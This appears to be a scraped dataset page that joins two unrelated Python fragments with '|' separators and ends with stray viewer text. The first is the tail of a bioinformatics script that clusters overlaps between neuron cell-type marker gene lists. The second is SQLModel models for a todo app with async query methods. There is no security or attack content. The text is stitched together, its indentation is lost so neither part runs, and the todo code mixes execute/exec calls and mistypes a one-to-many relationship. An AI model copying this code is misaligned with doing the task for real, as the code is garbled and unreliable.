dist = [[compute_jaccard(data.loc[~pd.isnull(data.loc[:,c]), c], data.loc[~pd.isnull(data.loc[:,j]), j]) for j in data.columns] for c in data.columns]
dist = pd.DataFrame(dist, columns=data.columns)
dist.index = data.columns
g = sns.clustermap(dist, cmap=viridis, row_colors=colors, col_colors=colors, linewidths=0.0, col_cluster=True, row_cluster=True)
g.savefig("marker_overlaps_"+header+'_all_clustered.pdf')
# def plot_venn_diagram():
# df = pd.read_csv("marker_name_list.csv")
# gdf = pd.read_csv("rank_gene_list_celltype.csv").iloc[0:100,:]
# for marker_type in ['major', 'minor']:
# if marker_type == 'major':
# df.loc[:,~df.columns.str.startswith('SM')]
# labels = venn.get_labels([range(10), range(5, 15), range(3, 8), range(8, 17), range(10, 20), range(13, 25)], fill=['number', 'logic'])
# fig, ax = venn.venn6(labels, names=['list 1', 'list 2', 'list 3', 'list 4', 'list 5', 'list 6'])
# fig.show()
if __name__ == "__main__":
mdirs = ['/data/rkawaguc/data/190814_BICCN_sf_marker', '/data/rkawaguc/data/190814_BICCN_sf_marker', '/data/rkawaguc/data/190425_BICCN_RNA/gene_annotation_from_scRNA', '/data/rkawaguc/data/190425_BICCN_RNA/gene_annotation_from_scRNA', '/data/rkawaguc/data/191003_BICCN_sf_marker_more']
mfiles = [['GABAergic_markers_fc.txt', 'Glutamatergic_markers_fc.txt', 'Non.Neuronal_markers_fc.txt'], ['cusanovich2018_inh.txt', 'cusanovich2018_ext.txt', 'cusanovich2018_gli.txt'], ['tasic2016_gaba.txt', 'tasic2016_glu.txt', 'tasic2016_gli.txt'], ['tasic2018_gaba.txt', 'tasic2018_glu.txt', 'tasic2018_gli.txt'], ['excitatory_L2.3.IT.txt', 'excitatory_L5.6.NP.txt', 'excitatory_L5.ET.txt', 'excitatory_L5.IT.txt', 'excitatory_L6.CT.txt', 'excitatory_L6.IT.Car3.txt', 'excitatory_L6b.txt', 'gabaergic_Lamp5.txt', 'gabaergic_Pvalb.txt', 'gabaergic_Sncg.txt', 'gabaergic_Sst.txt', 'gabaergic_Vip.txt']]
methods = ['plot_marker', 'make_rank_list', 'plot_rank', 'rank_evaluation', 'summarize_evaluation', 'exp_evaluation', 'prom_dist'][5:]
if len(sys.argv) > 1:
method = [sys.argv[1]]
else:
method = methods
for m in method:
if m == 'plot_marker':
plot_marker()
elif m == 'make_rank_list':
integrate_rank_data(mdirs, mfiles)
elif m == 'plot_rank': # after make rank list
plot_heatmap_rank()
elif m == 'rank_evaluation':
rank_evaluation()
elif m == 'summarize_evaluation':
summarize_auc_result()
elif m == 'exp_evaluation':
plot_auc_from_exp()
elif m == 'prom_dist':
compare_prom_and_dist()
elif m == 'marker_similarity':
compute_marker_overlap()
elif m == 'plot_cluster_mean':
files = ["BICCN2_gene_id_order_gene__all_", "GSE111586_gene_id_order_gene__all_bin_", "GSE123576_gene_id_order_gene__all_", "GSE126074_gene_id_order_gene__all_", "GSE127257_distal_id_gene_order__all_", "GSE1303990_gene_id_order_gene__all_"]
for cluster in ['celltype', 'cluster', 'icluster']:
if cluster == 'cluster':
files.extend(["GSE100033_gene_id_order_gene__all_"])
plot_aggregated_cluster_mean(mdirs, mfiles, files, cluster)
|
from __future__ import annotations
from datetime import datetime
from typing import Iterator
from sqlalchemy.ext.asyncio import AsyncSession
from sqlmodel import SQLModel, Field, Relationship, select
from todo_app.status import Status
class Task(SQLModel, table=True):
id: int = Field(primary_key=True)
name: str
description: str
author_id: int = Field(foreign_key="user.id")
project_id: int = Field(foreign_key="project.id")
status: str = Status.NOT_COMPLETED
created: datetime = Field(default_factory=datetime.utcnow)
completed: datetime = Field(default_factory=datetime.utcnow)
author: User = Relationship()
project: Project = Relationship()
class Project(SQLModel, table=True):
id: int = Field(primary_key=True)
name: str
description: str
owner_id: int = Field(foreign_key="user.id")
archived: bool = False
inbox: bool = False
owner: User = Relationship()
async def get_tasks(self, session: AsyncSession) -> list[Task]:
query = select(Task).where(Task.project_id == self.id)
result = await session.execute(query)
return result.scalars().all()
async def get_completed_tasks(self, session: AsyncSession) -> list[Task]:
query = select(Task).where(
Task.project_id == self.id, Task.status == Status.COMPLETED
)
result = await session.exec(query)
return result.all()
async def get_unfinished_tasks(self, session: AsyncSession) -> list[Task]:
query = select(Task).where(
Task.project_id == self.id, Task.status == Status.NOT_COMPLETED
)
result = await session.exec(query)
return result.all()
class User(SQLModel, table=True):
id: int = Field(primary_key=True)
name: str
joined: datetime = Field(default_factory=datetime.utcnow)
last_login: datetime = Field(default_factory=datetime.utcnow)
projects: Project = Relationship()
async def get_inbox(self, session: AsyncSession) -> Project:
query = select(Project).where(Project.inbox, Project.owner_id == self.id)
if project := (await session.execute(query)).scalars().first():
return project
if projects := await self.get_projects(session):
return projects[0]
raise ValueError(
f"{self!r} doesn't have any projects. Could not find an inbox."
)
async def get_active_projects(self, session: AsyncSession) -> Iterator[Project]:
query = select(Project).where(
Project.owner_id == self.id, Project.archived == False
)
result = await session.exec(query)
return result.scalars().all()
async def get_archived_projects(self, session: AsyncSession) -> Iterator[Project]:
query = select(Project).where(
Project.owner_id == self.id, Project.archived == True
)
result = await session.exec(query)
return result.all()
async def get_projects(self, session: AsyncSession) -> list[Project]:
query = select(Project).where(Project.owner_id == self.id)
result = await session.execute(query)
return result.scalars().all()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.